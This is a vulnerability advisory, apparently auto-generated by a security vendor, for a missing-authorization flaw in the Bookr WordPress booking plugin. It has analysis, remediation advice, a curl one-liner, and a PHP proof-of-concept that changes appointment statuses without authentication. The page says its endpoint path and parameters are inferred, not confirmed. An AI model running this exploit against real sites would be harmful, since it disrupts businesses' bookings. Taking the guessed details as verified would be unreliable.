Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-1932: Appointment Booking Calendar Plugin <= 1.0.2 – Missing Authorization to Unauthenticated Arbitrary Appointment Status Modification (bookr)

CVE ID CVE-2026-1932
Plugin bookr
Severity Medium (CVSS 5.3)
CWE 862
Vulnerable Version 1.0.2
Patched Version
Disclosed February 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1932 (metadata-based):
This vulnerability allows unauthenticated attackers to modify the status of any appointment in the Appointment Booking Calendar Plugin – Bookr for WordPress versions up to and including 1.0.2. The issue resides in the plugin’s REST API endpoint handling, specifically the update-appointment endpoint. The CVSS score of 5.3 (Medium) reflects the network accessibility, low attack complexity, and integrity impact without confidentiality or availability loss.

Atomic Edge research identifies the root cause as a missing capability check (CWE-862) on the update-appointment REST API endpoint. The vulnerability description confirms the absence of an authorization mechanism. Without source code, we infer the endpoint likely uses the WordPress REST API infrastructure, registers a route without proper permission_callback, and directly processes user-supplied parameters. This inference aligns with the CWE classification and common WordPress plugin patterns where REST endpoints omit the permission_callback parameter in register_rest_route().

Exploitation requires sending an HTTP request to the vulnerable REST endpoint. The attacker crafts a POST or PUT request to /wp-json/bookr/v1/update-appointment (the exact namespace is inferred from plugin slug conventions). The payload includes parameters like appointment_id and status. No authentication headers or cookies are needed. A sample request uses curl -X POST https://target.site/wp-json/bookr/v1/update-appointment -d ‘appointment_id=123&status=cancelled’. Attackers can enumerate appointment IDs or intercept legitimate appointment IDs from public pages.

Remediation requires implementing proper authorization checks. The plugin must add a permission_callback function to the register_rest_route() call for the update-appointment endpoint. This callback should verify the user has appropriate capabilities (like manage_options or a custom appointment_management capability). The fix should also validate the current user’s permissions against the target appointment’s ownership or administrative rights. WordPress REST API best practices mandate permission_callback for all routes modifying data.

The impact is unauthorized modification of appointment statuses. Attackers can cancel, confirm, or reschedule appointments, disrupting business operations, causing financial loss, and damaging trust. While the vulnerability does not permit data theft or full system compromise, it enables denial-of-service against the booking system. Malicious actors could mass-cancel appointments or create confusion by altering statuses. The integrity impact is direct, with potential secondary impacts on service delivery and reputation.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1932 - Appointment Booking Calendar Plugin <= 1.0.2 - Missing Authorization to Unauthenticated Arbitrary Appointment Status Modification
<?php
/**
 * Proof of Concept for CVE-2026-1932
 * Assumptions based on vulnerability description and WordPress REST API patterns:
 * 1. The plugin registers a REST route at a path containing 'update-appointment'
 * 2. The endpoint accepts POST or PUT requests
 * 3. The endpoint expects at least 'appointment_id' and 'status' parameters
 * 4. No authentication or nonce is required
 * The exact namespace (/bookr/v1/) is inferred from common plugin slug conventions.
 */

$target_url = 'https://example.com'; // CHANGE THIS
$endpoint = '/wp-json/bookr/v1/update-appointment'; // Inferred REST path
$appointment_id = 1; // Target appointment ID
$new_status = 'cancelled'; // Status to set

$url = $target_url . $endpoint;

$data = array(
    'appointment_id' => $appointment_id,
    'status' => $new_status
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// No authentication headers or cookies set
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Status: $http_coden";
echo "Response: $responsen";

if ($http_code == 200) {
    echo "[+] Appointment status likely modified.n";
} else {
    echo "[-] Exploit may have failed or endpoint path differs.n";
}
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School